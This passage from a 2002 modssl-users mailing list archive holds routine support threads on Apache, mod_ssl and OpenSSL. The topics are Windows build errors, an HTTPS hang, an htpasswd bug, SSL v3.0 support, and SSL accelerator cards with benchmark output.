typedef ULONG_PTR HCRYPTHASH;

...missing typedef for ULONG_PTR causes errors on lines 243 and 244

WinCrypt.h (243) : error C2061: syntax error : identifier 'HCRYPTPROV'
WinCrypt.h (243) : error C2059: syntax error : ';'
WinCrypt.h (244) : error C2061: syntax error : identifier 'HCRYPTKEY'
WinCrypt.h (244) : error C2059: syntax error : ';'
WinCrypt.h ... missing errors

There are several ways to cludge this but I am not going to suggest it.

We can look for proper an explanation -- by following the header 
dependencies.

Send more details if you like .. hope this leads towards a solution.

Chris


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 15:02:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA02158; Thu, 1 Aug 2002 15:01:49 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA02057; Thu, 1 Aug 2002 15:00:27 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id F11DA4CE768; Thu,  1 Aug 2002 15:00:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 91ED22873D; Thu,  1 Aug 2002 14:50:36 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from stargate.citadelcomputer.com.au id JAA04594; Thu, 1 Aug 2002 09:02:58 +0200 (MET DST)
Received: from jupiter.citadelcomputer.com.au (jupiter [10.10.0.20])
	by stargate.citadelcomputer.com.au (8.12.4/8.11.2) with ESMTP id g7172ZJ0017810
	for ; Thu, 1 Aug 2002 17:02:36 +1000
Received: by JUPITER with Internet Mail Service (5.5.2653.19)
	id ; Thu, 1 Aug 2002 17:02:34 +1000
Message-ID: <200FAA488DE0D41194F10010B597610D4459FB@JUPITER>
From: George Vieira 
To: "'modssl-users@modssl.org'" 
Subject: Mod_ssl on Apache 2.0.36 dies???
Date: Thu, 1 Aug 2002 17:02:33 +1000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: George Vieira 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

I've compiled Apache 2.0.36 and mod_ssl with came with it but the symptons
I'm having is that it all works fine until you leave the server running for
a while (can be minutes to hours) and then when I go to browse the secure
site, I get prompted about the certificate (not an CA but demo one) and I
say yes and then it hangs there and then times out.

I browse the normal http:// page and it's fine.. but the secure one has this
timeout problem. 

I restart the httpd service and it's fine again until some time later..??


Anybody seen this problem???

thanks,
George Vieira
Systems Manager
Citadel Computer Systems P/L
http://www.citadelcomputer.com.au

NOTE - This communication contains information which is confidential and
copyright to Citadel Computer Systems Pty Ltd or a third party.

If you are not the intended recipient of this communication please delete
and destroy all copies and telephone Citadel Computer Systems on 61 2 9955
2644 immediately.  If you are the intended recipient of this communication
you should not copy, disclose or distribute this communication without the
authority of Citadel Computer Systems Pty Ltd.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 15:03:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA02189; Thu, 1 Aug 2002 15:02:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA02061; Thu, 1 Aug 2002 15:00:28 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9C24B4CE771; Thu,  1 Aug 2002 15:00:25 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 99BD22886B; Thu,  1 Aug 2002 14:51:31 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from postman.eglin.af.mil id NAA27322; Thu, 1 Aug 2002 13:41:55 +0200 (MET DST)
Received: from filter1.eglin.af.mil (filter1.eglin.af.mil [129.61.2.39])
	by postman.eglin.af.mil (8.12.2/8.12.2) with SMTP id g71BfUtZ016229
	for ; Thu, 1 Aug 2002 06:41:37 -0500 (CDT)
Received: from filter1.eglin.af.mil ([129.61.2.39])
 by filter1.eglin.af.mil (NAVGW 2.5.1.19) with SMTP id M2002080106413613557
 for ; Thu, 01 Aug 2002 06:41:36 -0500
Received: FROM hub2.eglin.af.mil BY filter1.eglin.af.mil ; Thu Aug 01 06:41:35 2002 -0500
Received: by hub2.eglin.af.mil with Internet Mail Service (5.5.2653.19)
	id <35CXBZQM>; Thu, 1 Aug 2002 06:40:19 -0500
Message-ID: <6A03DF6AF8C44947A94DC1FC8C7C431F292AA1@mail09b.eglin.af.mil>
From: Cagle Larence G Contr 96 CG/SCTOA 
To: "'modssl-users@modssl.org'" 
Subject: RE: HTPASSWD Utility
Date: Thu, 1 Aug 2002 06:41:35 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23950.63E6EB40"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cagle Larence G Contr 96 CG/SCTOA 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23950.63E6EB40
Content-Type: text/plain

OK.  Thanx.

-----Original Message-----
From: Daniel Lopez [mailto:daniel@rawbyte.com] 
Sent: Wednesday, July 31, 2002 10:46 PM
To: modssl-users@modssl.org
Subject: Re: HTPASSWD Utility



       

On Wed, Jul 31, 2002 at 12:59:20PM -0500, Cagle Larence G Contr 96 CG/SCTOA
wrote:
> The htpasswd.exe utility in Apache_2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32.zip
> aborts with an error message when you try to add or update a password.  It
> responds with "The process cannot access the file because it is being used
> by another process".  I thought perhaps that Apache had not closed the
> password file when it was started, so I stopped the tasks related to
Apache
> and tried it again.  Same result.  I'm running the server on a PC with
> Windows XP Professional OS.
> 
>  
> 
> I downloaded and unzipped htpasswd.exe from the
> Apache_2.0.37-dev_mod_ssl_2.0.37_dev_OpenSSL-0.9.6c-WIN32.zip file and it
> works like it used to in earlier versions.

The htpasswd.exe utility on Windows has known bugs that have been fixed for
2.0.40  You can use previous versions like the one you mention, they are ok.

Cheers

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C23950.63E6EB40
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: HTPASSWD Utility




OK.  Thanx.




-----Original Message-----

From: Daniel Lopez [mailto:daniel@rawbyte.com] =


Sent: Wednesday, July 31, 2002 10:46 PM

To: modssl-users@modssl.org

Subject: Re: HTPASSWD Utility








       




On Wed, Jul 31, 2002 at 12:59:20PM -0500, Cagle =
Larence G Contr 96 CG/SCTOA wrote:

> The htpasswd.exe utility in =
Apache_2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32.zip

> aborts with an error message when you try to =
add or update a password.  It

> responds with "The process cannot access =
the file because it is being used

> by another process".  I thought =
perhaps that Apache had not closed the

> password file when it was started, so I stopped =
the tasks related to Apache

> and tried it again.  Same result.  =
I'm running the server on a PC with

> Windows XP Professional OS.

> 



> 

> I downloaded and unzipped htpasswd.exe from =
the

> =
Apache_2.0.37-dev_mod_ssl_2.0.37_dev_OpenSSL-0.9.6c-WIN32.zip file and =
it

> works like it used to in earlier =
versions.




The htpasswd.exe utility on Windows has known bugs =
that have been fixed for

2.0.40  You can use previous versions like the =
one you mention, they are ok.




Cheers




Daniel




--

Teach Yourself Apache 2 -- http://apacheworld.org/ty24/

_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C23950.63E6EB40--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 23:20:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA12712; Thu, 1 Aug 2002 23:19:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id XAA12672; Thu, 1 Aug 2002 23:18:23 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g71LIGD11992
	for ; Thu, 1 Aug 2002 17:18:17 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 1 Aug 2002 17:09:46 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: openssl-0.9.6e failing to bld on Windows
Date: Thu, 1 Aug 2002 17:09:42 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Has anyone else seen this error. I'm building with VC++ 7 on Win2k SP2.

        link /nologo /subsystem:console /machine:I386 /opt:ref /dll
/out:out32dll\ssleay32.dll /def:ms/SSLEAY32.def
@C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1\nm2F.tmp
ms/SSLEAY32.def(7) : warning LNK4017: DESCRIPTION statement not supported
for the target platform; ignored
   Creating library out32dll\ssleay32.lib and object out32dll\ssleay32.exp
s3_clnt.obj : error LNK2019: unresolved external symbol _OpenSSLDie
referenced in function _ssl3_client_hello
ssl_sess.obj : error LNK2019: unresolved external symbol _OpenSSLDie
referenced in function _SSL_get1_session
ssl_asn1.obj : error LNK2019: unresolved external symbol _OpenSSLDie
referenced in function _d2i_SSL_SESSION
s2_srvr.obj : error LNK2019: unresolved external symbol _OpenSSLDie
referenced in function _get_client_hello
s2_clnt.obj : error LNK2019: unresolved external symbol _OpenSSLDie
referenced in function _client_hello
s2_lib.obj : error LNK2001: unresolved external symbol _OpenSSLDie
s3_srvr.obj : error LNK2019: unresolved external symbol _OpenSSLDie
referenced in function _ssl3_send_hello_request
out32dll\ssleay32.dll : fatal error LNK1120: 1 unresolved externals
NMAKE : fatal error U1077: 'link' : return code '0x460'
Stop.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 23:24:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA13020; Thu, 1 Aug 2002 23:23:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id XAA12945; Thu, 1 Aug 2002 23:22:25 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KKSSKOPBXC0025IF@mdx.ac.uk> for modssl-users@modssl.org; Thu,
 01 Aug 2002 22:22:05 +0100 (BST)
Received: from mdx-bg-staff1.nw.mdx.ac.uk
 (mdx-bg-staff1.mdx.ac.uk [158.94.39.4]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KKSSKOD19E002A3K@mdx.ac.uk> for modssl-users@modssl.org; Thu,
 01 Aug 2002 22:22:04 +0100 (BST)
Received: from MDX-BG-STAFF1/SpoolDir by mdx-bg-staff1.nw.mdx.ac.uk
 (Mercury 1.48); Thu, 01 Aug 2002 22:17:48 +0000
Received: from SpoolDir by MDX-BG-STAFF1 (Mercury 1.48); Thu,
 01 Aug 2002 22:17:06 +0000
Date: Thu, 01 Aug 2002 22:16:56 +0000
From: a.moon@mdx.ac.uk
Subject: openssl-0.9.6e failing to bld on Windows
To: modssl-users@modssl.org
Message-id: <393BB6D556A@mdx-bg-staff1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am away from the office until the Monday 5th August 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  2 06:18:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA09522; Fri, 2 Aug 2002 06:17:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from UberGeek id GAA09489; Fri, 2 Aug 2002 06:16:30 +0200 (MET DST)
Received: (qmail 7411 invoked by uid 500); 2 Aug 2002 04:16:22 -0000
Subject: SSL V3.0
From: Austin Gonyou 
To: modssl-users@modssl.org
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-b0sNsqAI4AxElSASgxsF"
Organization: Coremetrics, Inc.
Message-Id: <1028261782.7381.0.camel@UberGeek.coremetrics.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.1.0.99 (Preview Release)
Date: 01 Aug 2002 23:16:22 -0500
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Austin Gonyou 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--=-b0sNsqAI4AxElSASgxsF
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Does mod SSL support SSL v3.0? Haven't investigated this yet, but
thought I'd ask here first.



--=20
Austin Gonyou 
Coremetrics, Inc.

--=-b0sNsqAI4AxElSASgxsF
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA9SgeW94g6ZVmFMoIRAv3bAJ0cWup5RWOTiWPw+Z7hPm2DwRqd2ACfaJcv
ClXEpL8z8vcBuWZILCadRqc=
=GgqY
-----END PGP SIGNATURE-----

--=-b0sNsqAI4AxElSASgxsF--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  2 06:40:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA10599; Fri, 2 Aug 2002 06:39:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id GAA10488; Fri, 2 Aug 2002 06:38:32 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id B1FF0254FC; Thu,  1 Aug 2002 21:28:53 -0700 (PDT)
Date: Thu, 1 Aug 2002 21:28:53 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: SSL V3.0
Message-ID: <20020802042853.GA17173@rawbyte.com>
References: <1028261782.7381.0.camel@UberGeek.coremetrics.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1028261782.7381.0.camel@UberGeek.coremetrics.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Aug 01, 2002 at 11:16:22PM -0500, Austin Gonyou wrote:
> Does mod SSL support SSL v3.0? Haven't investigated this yet, but
> thought I'd ask here first.

Yes it does, it is right there, in the front page for www.modssl.org
Nothing to investigate :)

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  2 18:49:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00933; Fri, 2 Aug 2002 18:48:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from UberGeek id SAA00929; Fri, 2 Aug 2002 18:48:06 +0200 (MET DST)
Received: (qmail 9263 invoked by uid 500); 2 Aug 2002 16:47:57 -0000
Subject: Re: SSL V3.0
From: Austin Gonyou 
To: modssl-users@modssl.org
In-Reply-To: <20020802042853.GA17173@rawbyte.com>
References: <20020802042853.GA17173@rawbyte.com>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-zZWdmaxrLqSCcrZYFvs/"
Organization: Coremetrics, Inc.
Message-Id: <1028306877.8898.14.camel@UberGeek.coremetrics.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.1.0.99 (Preview Release)
Date: 02 Aug 2002 11:47:57 -0500
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Austin Gonyou 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--=-zZWdmaxrLqSCcrZYFvs/
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

HAH..Sorry. :) Thanks much.=20

On Thu, 2002-08-01 at 23:28, Daniel Lopez wrote:
> On Thu, Aug 01, 2002 at 11:16:22PM -0500, Austin Gonyou wrote:
> > Does mod SSL support SSL v3.0? Haven't investigated this yet, but
> > thought I'd ask here first.
>=20
> Yes it does, it is right there, in the front page for www.modssl.org
> Nothing to investigate :)
>=20
> Daniel
>=20
> --
> Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
>=20
>=20
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
--=20
Austin Gonyou 
Coremetrics, Inc.

--=-zZWdmaxrLqSCcrZYFvs/
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA9Sre994g6ZVmFMoIRArl5AKCX2G6UYkKdnci9G8ubKmNS8GmHywCggOTs
ax8cX/PDnNWwrlF36fPlGEQ=
=z8IG
-----END PGP SIGNATURE-----

--=-zZWdmaxrLqSCcrZYFvs/--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  2 19:31:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA02165; Fri, 2 Aug 2002 19:30:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.sdsu.edu id TAA02133; Fri, 2 Aug 2002 19:30:05 +0200 (MET DST)
Received: from localhost (dlowenst@localhost)
	by mail.sdsu.edu (8.11.4/8.11.4) with ESMTP id g72HTwi26209
	for ; Fri, 2 Aug 2002 10:29:58 -0700 (PDT)
Date: Fri, 2 Aug 2002 10:29:58 -0700 (PDT)
From: David Lowenstein 
To: modssl-users@modssl.org
Subject: SSL Accelerators
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Lowenstein 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Can anyone out there recommend an affordable ssl accelerator that will
work with a sun enterprise 420? I'm interested in either a pci card or a
standalone unit.

Unfortunately I'm about to launch a website under ssl and we really don't
know just how much that's going to hamper performance.

Also, any performance tuning tips for ssl would be appreciated (for
apache webserver with mod_perl and bea weblogic)

Thanks

Dave

Dave Lowenstein
Programmer/Analyst
Instructional Technology Services
San Diego State University
(619)594-0270
http://www-rohan.sdsu.edu/dept/its

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  2 20:16:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA03692; Fri, 2 Aug 2002 20:15:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id UAA03556; Fri, 2 Aug 2002 20:14:49 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 6CBF625508; Fri,  2 Aug 2002 11:05:08 -0700 (PDT)
Date: Fri, 2 Aug 2002 11:05:08 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: SSL Accelerators
Message-ID: <20020802180508.GA20442@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Aug 02, 2002 at 10:29:58AM -0700, David Lowenstein wrote:
> Can anyone out there recommend an affordable ssl accelerator that will
> work with a sun enterprise 420? I'm interested in either a pci card or a
> standalone unit.
> 
> Unfortunately I'm about to launch a website under ssl and we really don't
> know just how much that's going to hamper performance.
>
> Also, any performance tuning tips for ssl would be appreciated (for
> apache webserver with mod_perl and bea weblogic)

My first advice would be to compile openssl with assembly optimizations on,
and make sure you configure session caching in the mod_ssl side.
Have you considered having dedicated boxes doing the ssl, serving static
content, and reverse proxying to the real servers?
That will also reduce the load in Apache, since each request ties a process
and in turn that child has a expensive Perl interpreter embedded, whether it
is serving static content or not. (I am assuming you are using 1.3 here)

Cheers

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  2 22:25:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA07185; Fri, 2 Aug 2002 22:24:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id WAA07180; Fri, 2 Aug 2002 22:23:45 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H08GNA00.F90 for ; Fri, 2 Aug 2002
          21:23:34 +0100 
Message-ID: <3D4AEA45.4000205@itaction.co.uk>
Date: Fri, 02 Aug 2002 21:23:33 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL Accelerators
References:  <20020802180508.GA20442@rawbyte.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

My recommendation is to look through openssl-engine doco and pick a 
supported card.

 From experience, I can say that the nCipher ones work just fine on 
sparc-solaris, I'm sure the other cards there do the job too.

I was testing out an nCipher nFast800 PCI card in a netra T1 today - 
seems to work as advertised... 800 sessions/second is what they say - 
it's based on the broadcom chip which a few vendors seem to have 
utilised. I don't know what your idea of affordable is and I dont 
actually know what they retail for though  - see www.ncipher.com for 
sales contacts i guess, unfortunately you dont see these on ebay very often.

The openssl-engine support for this one is invoked with the name 'ubsec'

for comparison here's the output of openssl speed -engine ubsec on my 
440Mhz Netra T1 test machine:

                  sign    verify    sign/s verify/s
rsa  512 bits   0.0001s   0.0001s  14426.2  19789.0
rsa 1024 bits   0.0001s   0.0001s  15316.7  14650.9
rsa 2048 bits   0.0000s   0.0000s  24600.0  83740.0
rsa 4096 bits   0.0250s   0.0247s     40.0     40.5
                  sign    verify    sign/s verify/s
dsa  512 bits   0.0000s   0.0000s  30890.0  26485.6
dsa 1024 bits   0.0000s   0.0000s  29602.1  26078.6
dsa 2048 bits   0.0000s   0.0000s  29574.0  27347.2

and without acceleration.....

                  sign    verify    sign/s verify/s
rsa  512 bits   0.0058s   0.0005s    171.6   1835.3
rsa 1024 bits   0.0325s   0.0018s     30.8    566.0
rsa 2048 bits   0.2085s   0.0063s      4.8    159.6
rsa 4096 bits   1.4543s   0.0232s      0.7     43.2
                  sign    verify    sign/s verify/s
dsa  512 bits   0.0054s   0.0067s    185.2    149.6
dsa 1024 bits   0.0173s   0.0216s     57.8     46.4
dsa 2048 bits   0.0607s   0.0758s     16.5     13.2



Daniel Lopez wrote:

>On Fri, Aug 02, 2002 at 10:29:58AM -0700, David Lowenstein wrote:
>  
>
>>Can anyone out there recommend an affordable ssl accelerator that will
>>work with a sun enterprise 420? I'm interested in either a pci card or a
>>standalone unit.
>>
>>Unfortunately I'm about to launch a website under ssl and we really don't
>>know just how much that's going to hamper performance.
>>
>>Also, any performance tuning tips for ssl would be appreciated (for
>>apache webserver with mod_perl and bea weblogic)
>>    
>>
>
>My first advice would be to compile openssl with assembly optimizations on,
>and make sure you configure session caching in the mod_ssl side.
>Have you considered having dedicated boxes doing the ssl, serving static
>content, and reverse proxying to the real servers?
>That will also reduce the load in Apache, since each request ties a process
>and in turn that child has a expensive Perl interpreter embedded, whether it
>is serving static content or not. (I am assuming you are using 1.3 here)
>
>Cheers
>
>Daniel
>
>--
>Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug  3 00:21:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA09566; Sat, 3 Aug 2002 00:20:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id AAA09555; Sat, 3 Aug 2002 00:19:49 +0200 (MET DST)
Received: from toilet ([24.202.196.150]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD5) with ESMTP
          id H08M0Z02.QTL for ; Fri, 2 Aug 2002
          18:19:47 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17aklv-0000Uc-00; Fri, 02 Aug 2002 18:19:47 -0400
Date: Fri, 2 Aug 2002 18:19:47 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: SSL Accelerators
In-Reply-To: <3D4AEA45.4000205@itaction.co.uk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 2 Aug 2002, Peter Viertel wrote:

> The openssl-engine support for this one is invoked with the name 'ubsec'
>
> for comparison here's the output of openssl speed -engine ubsec on my
> 440Mhz Netra T1 test machine:

You should probably run that with the "-elapsed" switch :-)

-- 
Geoff Thorpe
geoff@geoffthorpe.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug  3 08:32:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA18113; Sat, 3 Aug 2002 08:31:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from lightning.fortheweb.com id IAA18107; Sat, 3 Aug 2002 08:30:19 +0200 (MET DST)
Received: (qmail 7053 invoked from network); 3 Aug 2002 06:30:09 -0000
Received: from ppp-207-214-212-37.sntc01.pacbell.net (HELO randy8jnfcavgx) (207.214.212.37)
